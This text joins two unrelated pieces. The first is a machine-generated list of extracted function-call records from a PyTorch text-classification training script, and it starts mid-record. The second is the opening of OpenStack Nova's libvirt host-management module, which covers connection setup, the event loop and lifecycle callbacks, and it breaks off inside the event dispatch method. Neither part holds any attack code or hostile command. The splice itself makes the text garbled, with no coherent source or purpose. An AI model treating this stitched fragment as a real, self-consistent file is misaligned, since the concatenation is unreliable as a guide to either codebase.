'total_steps'}), '(optimizer, num_warmup_steps=0.1 *\n total_steps, num_training_steps=total_steps)\n', (24820, 24903), False, 'from transformers import AdamW, get_linear_schedule_with_warmup\n'), ((27329, 27372), 'os.path.join', 'os.path.join', (['self.dataset_dir', 'loader_name'], {}), '(self.dataset_dir, loader_name)\n', (27341, 27372), False, 'import os\n'), ((27384, 27411), 'os.path.exists', 'os.path.exists', (['loader_file'], {}), '(loader_file)\n', (27398, 27411), False, 'import os\n'), ((29199, 29243), 'torch.distributed.all_gather', 'dist.all_gather', (['gather_input_ids', 'input_ids'], {}), '(gather_input_ids, input_ids)\n', (29214, 29243), True, 'import torch.distributed as dist\n'), ((29252, 29298), 'torch.distributed.all_gather', 'dist.all_gather', (['gather_input_mask', 'input_mask'], {}), '(gather_input_mask, input_mask)\n', (29267, 29298), True, 'import torch.distributed as dist\n'), ((29307, 29343), 'torch.distributed.all_gather', 'dist.all_gather', (['gather_preds', 'preds'], {}), '(gather_preds, preds)\n', (29322, 29343), True, 'import torch.distributed as dist\n'), ((32858, 32972), 'transformers.get_linear_schedule_with_warmup', 'get_linear_schedule_with_warmup', (['optimizer'], {'num_warmup_steps': '(0.1 * total_steps)', 'num_training_steps': 'total_steps'}), '(optimizer, num_warmup_steps=0.1 *\n total_steps, num_training_steps=total_steps)\n', (32889, 32972), False, 'from transformers import AdamW, get_linear_schedule_with_warmup\n'), ((34077, 34120), 'os.path.join', 'os.path.join', (['self.dataset_dir', 'loader_name'], {}), '(self.dataset_dir, loader_name)\n', (34089, 34120), False, 'import os\n'), ((34132, 34159), 'os.path.exists', 'os.path.exists', (['loader_file'], {}), '(loader_file)\n', (34146, 34159), False, 'import os\n'), ((37219, 37262), 'os.path.join', 'os.path.join', (['self.dataset_dir', 'loader_name'], {}), '(self.dataset_dir, loader_name)\n', (37231, 37262), False, 'import os\n'), ((37278, 37305), 'os.path.exists', 'os.path.exists', (['loader_file'], {}), '(loader_file)\n', (37292, 37305), False, 'import os\n'), ((37469, 37546), 'torch.utils.data.TensorDataset', 'TensorDataset', (["self.test_data['input_ids']", "self.test_data['attention_masks']"], {}), "(self.test_data['input_ids'], self.test_data['attention_masks'])\n", (37482, 37546), False, 'from torch.utils.data import TensorDataset, DataLoader, SequentialSampler\n'), ((37780, 37820), 'os.path.join', 'os.path.join', (['self.dataset_dir', 'out_file'], {}), '(self.dataset_dir, out_file)\n', (37792, 37820), False, 'import os\n'), ((38574, 38585), 'sys.exit', 'sys.exit', (['(1)'], {}), '(1)\n', (38582, 38585), False, 'import sys\n'), ((5263, 5286), 'torch.load', 'torch.load', (['loader_file'], {}), '(loader_file)\n', (5273, 5286), False, 'import torch\n'), ((5852, 5896), 'torch.cat', 'torch.cat', (['[result[0] for result in results]'], {}), '([result[0] for result in results])\n', (5861, 5896), False, 'import torch\n'), ((5997, 6041), 'torch.cat', 'torch.cat', (['[result[1] for result in results]'], {}), '([result[1] for result in results])\n', (6006, 6041), False, 'import torch\n'), ((6636, 6665), 'torch.save', 'torch.save', (['data', 'loader_file'], {}), '(data, loader_file)\n', (6646, 6665), False, 'import torch\n'), ((6720, 6769), 'os.path.join', 'os.path.join', (['dataset_dir', 'label_name_loader_name'], {}), '(dataset_dir, label_name_loader_name)\n', (6732, 6769), False, 'import os\n'), ((6785, 6812), 'os.path.exists', 'os.path.exists', (['loader_file'], {}), '(loader_file)\n', (6799, 6812), False, 'import os\n'), ((8684, 8726), 'torch.ones', 'torch.ones', (['self.max_len'], {'dtype': 'torch.long'}), '(self.max_len, dtype=torch.long)\n', (8694, 8726), False, 'import torch\n'), ((10713, 10745), 'torch.cat', 'torch.cat', (['label_name_idx'], {'dim': '(0)'}), '(label_name_idx, dim=0)\n', (10722, 10745), False, 'import torch\n'), ((10800, 10845), 'torch.ones', 'torch.ones', (['(0)', 'self.max_len'], {'dtype': 'torch.long'}), '(0, self.max_len, dtype=torch.long)\n', (10810, 10845), False, 'import torch\n'), ((10892, 10937), 'torch.ones', 'torch.ones', (['(0)', 'self.max_len'], {'dtype': 'torch.long'}), '(0, self.max_len, dtype=torch.long)\n', (10902, 10937), False, 'import torch\n'), ((10967, 11012), 'torch.ones', 'torch.ones', (['(0)', 'self.max_len'], {'dtype': 'torch.long'}), '(0, self.max_len, dtype=torch.long)\n', (10977, 11012), False, 'import torch\n'), ((11736, 11778), 'os.path.join', 'os.path.join', (['dataset_dir', 'label_name_file'], {}), '(dataset_dir, label_name_file)\n', (11748, 11778), False, 'import os\n'), ((12857, 12949), 'torch.utils.data.TensorDataset', 'TensorDataset', (["data_dict['input_ids']", "data_dict['attention_masks']", "data_dict['labels']"], {}), "(data_dict['input_ids'], data_dict['attention_masks'],\n data_dict['labels'])\n", (12870, 12949), False, 'from torch.utils.data import TensorDataset, DataLoader, SequentialSampler\n'), ((12982, 13049), 'torch.utils.data.TensorDataset', 'TensorDataset', (["data_dict['input_ids']", "data_dict['attention_masks']"], {}), "(data_dict['input_ids'], data_dict['attention_masks'])\n", (12995, 13049), False, 'from torch.utils.data import TensorDataset, DataLoader, SequentialSampler\n'), ((14581, 14626), 'numpy.delete', 'np.delete', (['self.category_vocab[i]', 'delete_idx'], {}), '(self.category_vocab[i], delete_idx)\n', (14590, 14626), True, 'import numpy as np\n'), ((15257, 15275), 'collections.defaultdict', 'defaultdict', (['float'], {}), '(float)\n', (15268, 15275), False, 'from collections import defaultdict\n'), ((15349, 15380), 'tqdm.tqdm', 'tqdm', (['label_name_dataset_loader'], {}), '(label_name_dataset_loader)\n', (15353, 15380), False, 'from tqdm import tqdm\n'), ((16870, 16923), 'os.path.join', 'os.path.join', (['self.temp_dir', "(f'{rank}_' + loader_name)"], {}), "(self.temp_dir, f'{rank}_' + loader_name)\n", (16882, 16923), False, 'import os\n'), ((16934, 16976), 'torch.save', 'torch.save', (['category_words_freq', 'save_file'], {}), '(category_words_freq, save_file)\n', (16944, 16976), False, 'import torch\n'), ((17420, 17443), 'torch.load', 'torch.load', (['loader_file'], {}), '(loader_file)\n', (17430, 17443), False, 'import torch\n'), ((17959, 17984), 'os.listdir', 'os.listdir', (['self.temp_dir'], {}), '(self.temp_dir)\n', (17969, 17984), False, 'import os\n'), ((18618, 18662), 'torch.save', 'torch.save', (['self.category_vocab', 'loader_file'], {}), '(self.category_vocab, loader_file)\n', (18628, 18662), False, 'import torch\n'), ((18678, 18707), 'os.path.exists', 'os.path.exists', (['self.temp_dir'], {}), '(self.temp_dir)\n', (18692, 18707), False, 'import os\n'), ((19507, 19533), 'tqdm.tqdm', 'tqdm', (['train_dataset_loader'], {}), '(train_dataset_loader)\n', (19511, 19533), False, 'from tqdm import tqdm\n'), ((21115, 21146), 'torch.cat', 'torch.cat', (['all_input_ids'], {'dim': '(0)'}), '(all_input_ids, dim=0)\n', (21124, 21146), False, 'import torch\n'), ((21176, 21208), 'torch.cat', 'torch.cat', (['all_mask_label'], {'dim': '(0)'}), '(all_mask_label, dim=0)\n', (21185, 21208), False, 'import torch\n'), ((21238, 21270), 'torch.cat', 'torch.cat', (['all_input_mask'], {'dim': '(0)'}), '(all_input_mask, dim=0)\n', (21247, 21270), False, 'import torch\n'), ((21537, 21590), 'os.path.join', 'os.path.join', (['self.temp_dir', "(f'{rank}_' + loader_name)"], {}), "(self.temp_dir, f'{rank}_' + loader_name)\n", (21549, 21590), False, 'import os\n'), ((21601, 21633), 'torch.save', 'torch.save', (['save_dict', 'save_file'], {}), '(save_dict, save_file)\n', (21611, 21633), False, 'import torch\n'), ((22091, 22114), 'torch.load', 'torch.load', (['loader_file'], {}), '(loader_file)\n', (22101, 22114), False, 'import torch\n'), ((22155, 22198), 'os.path.join', 'os.path.join', (['self.dataset_dir', 'loader_name'], {}), '(self.dataset_dir, loader_name)\n', (22167, 22198), False, 'import os\n'), ((22622, 22647), 'os.listdir', 'os.listdir', (['self.temp_dir'], {}), '(self.temp_dir)\n', (22632, 22647), False, 'import os\n'), ((22908, 22970), 'torch.cat', 'torch.cat', (["[res['all_input_ids'] for res in gather_res]"], {'dim': '(0)'}), "([res['all_input_ids'] for res in gather_res], dim=0)\n", (22917, 22970), False, 'import torch\n'), ((23000, 23063), 'torch.cat', 'torch.cat', (["[res['all_mask_label'] for res in gather_res]"], {'dim': '(0)'}), "([res['all_mask_label'] for res in gather_res], dim=0)\n", (23009, 23063), False, 'import torch\n'), ((23093, 23156), 'torch.cat', 'torch.cat', (["[res['all_input_mask'] for res in gather_res]"], {'dim': '(0)'}), "([res['all_input_mask'] for res in gather_res], dim=0)\n", (23102, 23156), False, 'import torch\n'), ((23681, 23719), 'torch.save', 'torch.save', (['self.mcp_data', 'loader_file'], {}), '(self.mcp_data, loader_file)\n', (23691, 23719), False, 'import torch\n'), ((23735, 23764), 'os.path.exists', 'os.path.exists', (['self.temp_dir'], {}), '(self.temp_dir)\n', (23749, 23764), False, 'import os\n'), ((27828, 27851), 'torch.load', 'torch.load', (['loader_file'], {}), '(loader_file)\n', (27838, 27851), False, 'import torch\n'), ((28411, 28446), 'torch.arange', 'torch.arange', (['idx', '(idx + target_num)'], {}), '(idx, idx + target_num)\n', (28423, 28446), False, 'import torch\n'), ((28961, 28987), 'torch.ones_like', 'torch.ones_like', (['input_ids'], {}), '(input_ids)\n', (28976, 28987), False, 'import torch\n'), ((29050, 29077), 'torch.ones_like', 'torch.ones_like', (['input_mask'], {}), '(input_mask)\n', (29065, 29077), False, 'import torch\n'), ((29135, 29157), 'torch.ones_like', 'torch.ones_like', (['preds'], {}), '(preds)\n', (29150, 29157), False, 'import torch\n'), ((29557, 29584), 'torch.sum', 'torch.sum', (['all_preds'], {'dim': '(0)'}), '(all_preds, dim=0)\n', (29566, 29584), False, 'import torch\n'), ((30211, 30234), 'tqdm.tqdm', 'tqdm', (['self_train_loader'], {}), '(self_train_loader)\n', (30215, 30234), False, 'from tqdm import tqdm\n'), ((31869, 31913), 'torch.distributed.all_gather', 'dist.all_gather', (['gather_list', 'avg_train_loss'], {}), '(gather_list, avg_train_loss)\n', (31884, 31913), True, 'import torch.distributed as dist\n'), ((31943, 31968), 'torch.tensor', 'torch.tensor', (['gather_list'], {}), '(gather_list)\n', (31955, 31968), False, 'import torch\n'), ((33805, 33848), 'os.path.join', 'os.path.join', (['self.dataset_dir', 'loader_name'], {}), '(self.dataset_dir, loader_name)\n', (33817, 33848), False, 'import os\n'), ((37400, 37423), 'torch.load', 'torch.load', (['loader_file'], {}), '(loader_file)\n', (37410, 37423), False, 'import torch\n'), ((1301, 1312), 'multiprocessing.cpu_count', 'cpu_count', ([], {}), '()\n', (1310, 1312), False, 'from multiprocessing import cpu_count\n'), ((5407, 5443), 'os.path.join', 'os.path.join', (['dataset_dir', 'text_file'], {}), '(dataset_dir, text_file)\n', (5419, 5443), False, 'import os\n'), ((5743, 5773), 'joblib.Parallel', 'Parallel', ([], {'n_jobs': 'self.num_cpus'}), '(n_jobs=self.num_cpus)\n', (5751, 5773), False, 'from joblib import Parallel, delayed\n'), ((6399, 6419), 'torch.tensor', 'torch.tensor', (['labels'], {}), '(labels)\n', (6411, 6419), False, 'import torch\n'), ((6924, 6947), 'torch.load', 'torch.load', (['loader_file'], {}), '(loader_file)\n', (6934, 6947), False, 'import torch\n'), ((7584, 7628), 'torch.cat', 'torch.cat', (['[result[0] for result in results]'], {}), '([result[0] for result in results])\n', (7593, 7628), False, 'import torch\n'), ((7679, 7723), 'torch.cat', 'torch.cat', (['[result[1] for result in results]'], {}), '([result[1] for result in results])\n', (7688, 7723), False, 'import torch\n'), ((7757, 7801), 'torch.cat', 'torch.cat', (['[result[2] for result in results]'], {}), '([result[2] for result in results])\n', (7766, 7801), False, 'import torch\n'), ((8185, 8234), 'os.path.join', 'os.path.join', (['dataset_dir', 'label_name_loader_name'], {}), '(dataset_dir, label_name_loader_name)\n', (8197, 8234), False, 'import os\n'), ((8326, 8366), 'torch.save', 'torch.save', (['label_name_data', 'loader_file'], {}), '(label_name_data, loader_file)\n', (8336, 8366), False, 'import torch\n'), ((17531, 17560), 'os.path.exists', 'os.path.exists', (['self.temp_dir'], {}), '(self.temp_dir)\n', (17545, 17560), False, 'import os\n'), ((17578, 17604), 'os.makedirs', 'os.makedirs', (['self.temp_dir'], {}), '(self.temp_dir)\n', (17589, 17604), False, 'import os\n'), ((18260, 18278), 'collections.defaultdict', 'defaultdict', (['float'], {}), '(float)\n', (18271, 18278), False, 'from collections import defaultdict\n'), ((18725, 18753), 'shutil.rmtree', 'shutil.rmtree', (['self.temp_dir'], {}), '(self.temp_dir)\n', (18738, 18753), False, 'import shutil\n'), ((22298, 22327), 'os.path.exists', 'os.path.exists', (['self.temp_dir'], {}), '(self.temp_dir)\n', (22312, 22327), False, 'import os\n'), ((22345, 22371), 'os.makedirs', 'os.makedirs', (['self.temp_dir'], {}), '(self.temp_dir)\n', (22356, 22371), False, 'import os\n'), ((23782, 23810), 'shutil.rmtree', 'shutil.rmtree', (['self.temp_dir'], {}), '(self.temp_dir)\n', (23795, 23810), False, 'import shutil\n'), ((26786, 26811), 'torch.tensor', 'torch.tensor', (['gather_list'], {}), '(gather_list)\n', (26798, 26811), False, 'import torch\n'), ((26982, 27025), 'os.path.join', 'os.path.join', (['self.dataset_dir', 'loader_name'], {}), '(self.dataset_dir, loader_name)\n', (26994, 27025), False, 'import os\n'), ((29364, 29398), 'torch.cat', 'torch.cat', (['gather_input_ids'], {'dim': '(0)'}), '(gather_input_ids, dim=0)\n', (29373, 29398), False, 'import torch\n'), ((29426, 29461), 'torch.cat', 'torch.cat', (['gather_input_mask'], {'dim': '(0)'}), '(gather_input_mask, dim=0)\n', (29435, 29461), False, 'import torch\n'), ((29488, 29518), 'torch.cat', 'torch.cat', (['gather_preds'], {'dim': '(0)'}), '(gather_preds, dim=0)\n', (29497, 29518), False, 'import torch\n'), ((31548, 31580), 'torch.distributed.all_gather', 'dist.all_gather', (['gather_acc', 'acc'], {}), '(gather_acc, acc)\n', (31563, 31580), True, 'import torch.distributed as dist\n'), ((31792, 31823), 'torch.ones_like', 'torch.ones_like', (['avg_train_loss'], {}), '(avg_train_loss)\n', (31807, 31823), False, 'import torch\n'), ((34601, 34687), 'torch.multiprocessing.spawn', 'mp.spawn', (['self.self_train_dist'], {'nprocs': 'self.world_size', 'args': '(epochs, loader_name)'}), '(self.self_train_dist, nprocs=self.world_size, args=(epochs,\n loader_name))\n', (34609, 34687), True, 'import torch.multiprocessing as mp\n'), ((36296, 36327), 'torch.cat', 'torch.cat', (['all_input_ids'], {'dim': '(0)'}), '(all_input_ids, dim=0)\n', (36305, 36327), False, 'import torch\n'), ((36361, 36393), 'torch.cat', 'torch.cat', (['all_input_mask'], {'dim': '(0)'}), '(all_input_mask, dim=0)\n', (36370, 36393), False, 'import torch\n'), ((36422, 36449), 'torch.cat', 'torch.cat', (['all_preds'], {'dim': '(0)'}), '(all_preds, dim=0)\n', (36431, 36449), False, 'import torch\n'), ((37606, 37633), 'torch.utils.data.SequentialSampler', 'SequentialSampler', (['test_set'], {}), '(test_set)\n', (37623, 37633), False, 'from torch.utils.data import TensorDataset, DataLoader, SequentialSampler\n'), ((1281, 1292), 'multiprocessing.cpu_count', 'cpu_count', ([], {}), '()\n', (1290, 1292), False, 'from multiprocessing import cpu_count\n'), ((3841, 3856), 'numpy.max', 'np.max', (['doc_len'], {}), '(doc_len)\n', (3847, 3856), True, 'import numpy as np\n'), ((3872, 3888), 'numpy.mean', 'np.mean', (['doc_len'], {}), '(doc_len)\n', (3879, 3888), True, 'import numpy as np\n'), ((3904, 3919), 'numpy.std', 'np.std', (['doc_len'], {}), '(doc_len)\n', (3910, 3919), True, 'import numpy as np\n'), ((3951, 3968), 'numpy.array', 'np.array', (['doc_len'], {}), '(doc_len)\n', (3959, 3968), True, 'import numpy as np\n'), ((6258, 6295), 'os.path.join', 'os.path.join', (['dataset_dir', 'label_file'], {}), '(dataset_dir, label_file)\n', (6270, 6295), False, 'import os\n'), ((7080, 7116), 'os.path.join', 'os.path.join', (['dataset_dir', 'text_file'], {}), '(dataset_dir, text_file)\n', (7092, 7116), False, 'import os\n'), ((7440, 7470), 'joblib.Parallel', 'Parallel', ([], {'n_jobs': 'self.num_cpus'}), '(n_jobs=self.num_cpus)\n', (7448, 7470), False, 'from joblib import Parallel, delayed\n'), ((15516, 15531), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (15529, 15531), False, 'import torch\n'), ((16373, 16429), 'torch.topk', 'torch.topk', (['predictions[match_idx]', 'top_pred_num'], {'dim': '(-1)'}), '(predictions[match_idx], top_pred_num, dim=-1)\n', (16383, 16429), False, 'import torch\n'), ((19659, 19674), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (19672, 19674), False, 'import torch\n'), ((20049, 20094), 'torch.topk', 'torch.topk', (['predictions', 'top_pred_num'], {'dim': '(-1)'}), '(predictions, top_pred_num, dim=-1)\n', (20059, 20094), False, 'import torch\n'), ((25129, 25153), 'tqdm.tqdm', 'tqdm', (['mcp_dataset_loader'], {}), '(mcp_dataset_loader)\n', (25133, 25153), False, 'from tqdm import tqdm\n'), ((26583, 26614), 'torch.ones_like', 'torch.ones_like', (['avg_train_loss'], {}), '(avg_train_loss)\n', (26598, 26614), False, 'import torch\n'), ((26708, 26752), 'torch.distributed.all_gather', 'dist.all_gather', (['gather_list', 'avg_train_loss'], {}), '(gather_list, avg_train_loss)\n', (26723, 26752), True, 'import torch.distributed as dist\n'), ((29621, 29645), 'torch.sum', 'torch.sum', (['weight'], {'dim': '(1)'}), '(weight, dim=1)\n', (29630, 29645), False, 'import torch\n'), ((30793, 30814), 'torch.nn.LogSoftmax', 'nn.LogSoftmax', ([], {'dim': '(-1)'}), '(dim=-1)\n', (30806, 30814), False, 'from torch import nn\n'), ((31478, 31498), 'torch.ones_like', 'torch.ones_like', (['acc'], {}), '(acc)\n', (31493, 31498), False, 'import torch\n'), ((35260, 35275), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (35273, 35275), False, 'import torch\n'), ((36583, 36612), 'torch.cat', 'torch.cat', (['pred_labels'], {'dim': '(0)'}), '(pred_labels, dim=0)\n', (36592, 36612), False, 'import torch\n'), ((36644, 36674), 'torch.cat', 'torch.cat', (['truth_labels'], {'dim': '(0)'}), '(truth_labels, dim=0)\n', (36653, 36674), False, 'import torch\n'), ((5341, 5377), 'os.path.join', 'os.path.join', (['dataset_dir', 'text_file'], {}), '(dataset_dir, text_file)\n', (5353, 5377), False, 'import os\n'), ((5774, 5794), 'joblib.delayed', 'delayed', (['self.encode'], {}), '(self.encode)\n', (5781, 5794), False, 'from joblib import Parallel, delayed\n'), ((36901, 36930), 'torch.cat', 'torch.cat', (['pred_labels'], {'dim': '(0)'}), '(pred_labels, dim=0)\n', (36910, 36930), False, 'import torch\n'), ((6188, 6225), 'os.path.join', 'os.path.join', (['dataset_dir', 'label_file'], {}), '(dataset_dir, label_file)\n', (6200, 6225), False, 'import os\n'), ((7010, 7046), 'os.path.join', 'os.path.join', (['dataset_dir', 'text_file'], {}), '(dataset_dir, text_file)\n', (7022, 7046), False, 'import os\n'), ((7471, 7506), 'joblib.delayed', 'delayed', (['self.label_name_occurrence'], {}), '(self.label_name_occurrence)\n', (7478, 7506), False, 'from joblib import Parallel, delayed\n'), ((18071, 18101), 'os.path.join', 'os.path.join', (['self.temp_dir', 'f'], {}), '(self.temp_dir, f)\n', (18083, 18101), False, 'import os\n'), ((20568, 20596), 'torch.sum', 'torch.sum', (['valid_idx'], {'dim': '(-1)'}), '(valid_idx, dim=-1)\n', (20577, 20596), False, 'import torch\n'), ((22734, 22764), 'os.path.join', 'os.path.join', (['self.temp_dir', 'f'], {}), '(self.temp_dir, f)\n', (22746, 22764), False, 'import os\n'), ((20205, 20233), 'torch.zeros_like', 'torch.zeros_like', (['sorted_res'], {}), '(sorted_res)\n', (20221, 20233), False, 'import torch\n'), ((20691, 20717), 'torch.ones_like', 'torch.ones_like', (['input_ids'], {}), '(input_ids)\n', (20706, 20717), False, 'import torch\n'), ((31603, 31627), 'torch.tensor', 'torch.tensor', (['gather_acc'], {}), '(gather_acc)\n', (31615, 31627), False, 'import torch\n'), ((35851, 35869), 'torch.nn.Softmax', 'nn.Softmax', ([], {'dim': '(-1)'}), '(dim=-1)\n', (35861, 35869), False, 'from torch import nn\n'), ((36011, 36039), 'torch.argmax', 'torch.argmax', (['logits'], {'dim': '(-1)'}), '(logits, dim=-1)\n', (36023, 36039), False, 'import torch\n'), ((36190, 36218), 'torch.argmax', 'torch.argmax', (['logits'], {'dim': '(-1)'}), '(logits, dim=-1)\n', (36202, 36218), False, 'import torch\n')] |
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
# Copyright (c) 2010 Citrix Systems, Inc.
# Copyright (c) 2011 Piston Cloud Computing, Inc
# Copyright (c) 2012 University Of Minho
# (c) Copyright 2013 Hewlett-Packard Development Company, L.P.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Manages information about the host OS and hypervisor.
This class encapsulates a connection to the libvirt
daemon and provides certain higher level APIs around
the raw libvirt API. These APIs are then used by all
the other libvirt related classes
"""
from collections import defaultdict
import inspect
import operator
import os
import queue
import socket
import threading
import typing as ty
from eventlet import greenio
from eventlet import greenthread
from eventlet import patcher
from eventlet import tpool
from oslo_log import log as logging
from oslo_utils import encodeutils
from oslo_utils import excutils
from oslo_utils import importutils
from oslo_utils import units
from oslo_utils import versionutils
import six
from nova.compute import utils as compute_utils
import nova.conf
from nova import context as nova_context
from nova import exception
from nova.i18n import _
from nova import rpc
from nova import utils
from nova.virt import event as virtevent
from nova.virt.libvirt import config as vconfig
from nova.virt.libvirt import guest as libvirt_guest
from nova.virt.libvirt import migration as libvirt_migrate
from nova.virt.libvirt import utils as libvirt_utils
if ty.TYPE_CHECKING:
import libvirt
else:
libvirt = None
LOG = logging.getLogger(__name__)
native_socket = patcher.original('socket')
native_threading = patcher.original("threading")
native_Queue = patcher.original("Queue" if six.PY2 else "queue")
CONF = nova.conf.CONF
# This list is for libvirt hypervisor drivers that need special handling.
# This is *not* the complete list of supported hypervisor drivers.
HV_DRIVER_QEMU = "QEMU"
HV_DRIVER_XEN = "Xen"
SEV_KERNEL_PARAM_FILE = '/sys/module/kvm_amd/parameters/sev'
class Host(object):
def __init__(self, uri, read_only=False,
conn_event_handler=None,
lifecycle_event_handler=None):
global libvirt
if libvirt is None:
libvirt = importutils.import_module('libvirt')
self._uri = uri
self._read_only = read_only
self._initial_connection = True
self._conn_event_handler = conn_event_handler
self._conn_event_handler_queue: queue.Queue[ty.Callable] = (
queue.Queue())
self._lifecycle_event_handler = lifecycle_event_handler
self._caps = None
self._domain_caps = None
self._hostname = None
self._wrapped_conn = None
self._wrapped_conn_lock = threading.Lock()
self._event_queue: ty.Optional[queue.Queue[ty.Callable]] = None
self._events_delayed = {}
# Note(toabctl): During a reboot of a domain, STOPPED and
# STARTED events are sent. To prevent shutting
# down the domain during a reboot, delay the
# STOPPED lifecycle event some seconds.
self._lifecycle_delay = 15
self._initialized = False
self._libvirt_proxy_classes = self._get_libvirt_proxy_classes(libvirt)
self._libvirt_proxy = self._wrap_libvirt_proxy(libvirt)
# AMD SEV is conditional on support in the hardware, kernel,
# qemu, and libvirt. This is determined on demand and
# memoized by the supports_amd_sev property below.
self._supports_amd_sev = None
self._has_hyperthreading = None
@staticmethod
def _get_libvirt_proxy_classes(libvirt_module):
"""Return a tuple for tpool.Proxy's autowrap argument containing all
classes defined by the libvirt module except libvirtError.
"""
# Get a list of (name, class) tuples of libvirt classes
classes = inspect.getmembers(libvirt_module, inspect.isclass)
# Return a list of just the classes, filtering out libvirtError because
# we don't need to proxy that
return tuple([cls[1] for cls in classes if cls[0] != 'libvirtError'])
def _wrap_libvirt_proxy(self, obj):
"""Return an object wrapped in a tpool.Proxy using autowrap appropriate
for the libvirt module.
"""
# libvirt is not pure python, so eventlet monkey patching doesn't work
# on it. Consequently long-running libvirt calls will not yield to
# eventlet's event loop, starving all other greenthreads until
# completion. eventlet's tpool.Proxy handles this situation for us by
# executing proxied calls in a native thread.
return tpool.Proxy(obj, autowrap=self._libvirt_proxy_classes)
def _native_thread(self):
"""Receives async events coming in from libvirtd.
This is a native thread which runs the default
libvirt event loop implementation. This processes
any incoming async events from libvirtd and queues
them for later dispatch. This thread is only
permitted to use libvirt python APIs, and the
driver.queue_event method. In particular any use
of logging is forbidden, since it will confuse
eventlet's greenthread integration
"""
while True:
libvirt.virEventRunDefaultImpl()
def _dispatch_thread(self):
"""Dispatches async events coming in from libvirtd.
This is a green thread which waits for events to
arrive from the libvirt event loop thread. This
then dispatches the events to the compute manager.
"""
while True:
self._dispatch_events()
def _conn_event_thread(self):
"""Dispatches async connection events"""
# NOTE(mdbooth): This thread doesn't need to jump through the same
# hoops as _dispatch_thread because it doesn't interact directly
# with the libvirt native thread.
while True:
self._dispatch_conn_event()
def _dispatch_conn_event(self):
# NOTE(mdbooth): Splitting out this loop looks redundant, but it
# means we can easily dispatch events synchronously from tests and
# it isn't completely awful.
handler = self._conn_event_handler_queue.get()
try:
handler()
except Exception:
LOG.exception('Exception handling connection event')
finally:
self._conn_event_handler_queue.task_done()
@staticmethod
def _event_lifecycle_callback(conn, dom, event, detail, opaque):
"""Receives lifecycle events from libvirt.
NB: this method is executing in a native thread, not
an eventlet coroutine. It can only invoke other libvirt
APIs, or use self._queue_event(). Any use of logging APIs
in particular is forbidden.
"""
self = opaque
uuid = dom.UUIDString()
transition = None
if event == libvirt.VIR_DOMAIN_EVENT_STOPPED:
transition = virtevent.EVENT_LIFECYCLE_STOPPED
elif event == libvirt.VIR_DOMAIN_EVENT_STARTED:
transition = virtevent.EVENT_LIFECYCLE_STARTED
elif event == libvirt.VIR_DOMAIN_EVENT_SUSPENDED:
if detail == libvirt.VIR_DOMAIN_EVENT_SUSPENDED_POSTCOPY:
transition = virtevent.EVENT_LIFECYCLE_POSTCOPY_STARTED
elif detail == libvirt.VIR_DOMAIN_EVENT_SUSPENDED_MIGRATED:
# VIR_DOMAIN_EVENT_SUSPENDED_MIGRATED is also sent when live
# migration of the guest fails, so we cannot simply rely
# on the event itself but need to check if the job itself was
# successful.
# NOTE(mriedem): The job check logic here is copied from
# LibvirtDriver._live_migration_monitor.
guest = libvirt_guest.Guest(dom)
info = guest.get_job_info()
if info.type == libvirt.VIR_DOMAIN_JOB_NONE:
# Either still running, or failed or completed,
# lets untangle the mess.
info.type = libvirt_migrate.find_job_type(
guest, instance=None, logging_ok=False)
if info.type == libvirt.VIR_DOMAIN_JOB_COMPLETED:
transition = virtevent.EVENT_LIFECYCLE_MIGRATION_COMPLETED
else:
# Failed or some other status we don't know about, so just
# opt to report the guest is paused.
transition = virtevent.EVENT_LIFECYCLE_PAUSED
else:
transition = virtevent.EVENT_LIFECYCLE_PAUSED
elif event == libvirt.VIR_DOMAIN_EVENT_RESUMED:
transition = virtevent.EVENT_LIFECYCLE_RESUMED
if transition is not None:
self._queue_event(virtevent.LifecycleEvent(uuid, transition))
def _close_callback(self, conn, reason, opaque):
close_info = {'conn': conn, 'reason': reason}
self._queue_event(close_info)
@staticmethod
def _test_connection(conn):
try:
conn.getLibVersion()
return True
except libvirt.libvirtError as e:
if (e.get_error_code() in (libvirt.VIR_ERR_SYSTEM_ERROR,
libvirt.VIR_ERR_INTERNAL_ERROR) and
e.get_error_domain() in (libvirt.VIR_FROM_REMOTE,
libvirt.VIR_FROM_RPC)):
LOG.debug('Connection to libvirt broke')
return False
raise
@staticmethod
def _connect_auth_cb(creds, opaque):
if len(creds) == 0:
return 0
raise exception.InternalError(
_("Can not handle authentication request for %d credentials")
% len(creds))
def _connect(self, uri, read_only):
auth = [[libvirt.VIR_CRED_AUTHNAME,
libvirt.VIR_CRED_ECHOPROMPT,
libvirt.VIR_CRED_REALM,
libvirt.VIR_CRED_PASSPHRASE,
libvirt.VIR_CRED_NOECHOPROMPT,
libvirt.VIR_CRED_EXTERNAL],
Host._connect_auth_cb,
None]
flags = 0
if read_only:
flags = libvirt.VIR_CONNECT_RO
return self._libvirt_proxy.openAuth(uri, auth, flags)
def _queue_event(self, event):
"""Puts an event on the queue for dispatch.
This method is called by the native event thread to
put events on the queue for later dispatch by the
green thread. Any use of logging APIs is forbidden.
"""
if self._event_queue is None:
return
# Queue the event...
self._event_queue.put(event)
# ...then wakeup the green thread to dispatch it
c = ' '.encode()
self._event_notify_send.write(c)
self._event_notify_send.flush()
def _dispatch_events(self):
"""Wait for & dispatch events from native thread
Blocks until native thread indicates some events
are ready. Then dispatches all queued events.
"""
# Wait to be notified that there are some
# events pending
try:
_c = self._event_notify_recv.read(1)
assert _c
except ValueError:
return # will be raised when pipe is closed
# Process as many events as possible without
# blocking
last_close_event = None
# required for mypy
if self._event_queue is None:
return
while not self._event_queue.empty():
try:
event_type = ty.Union[
virtevent.LifecycleEvent, ty.Mapping[str, ty.Any]]
event: event_type = self._event_queue.get(block=False)
if isinstance(event, virtevent.LifecycleEvent):
# call possibly with delay
self._event_emit_delayed(event)
elif 'conn' in event and 'reason' in event:
last_close_event = event
except native_Queue.Empty:
pass
if last_close_event is None:
return
conn = last_close_event['conn']
# get_new_connection may already have disabled the host,
# in which case _wrapped_conn is None.
with self._wrapped_conn_lock:
if conn == self._wrapped_conn:
reason = str(last_close_event['reason'])
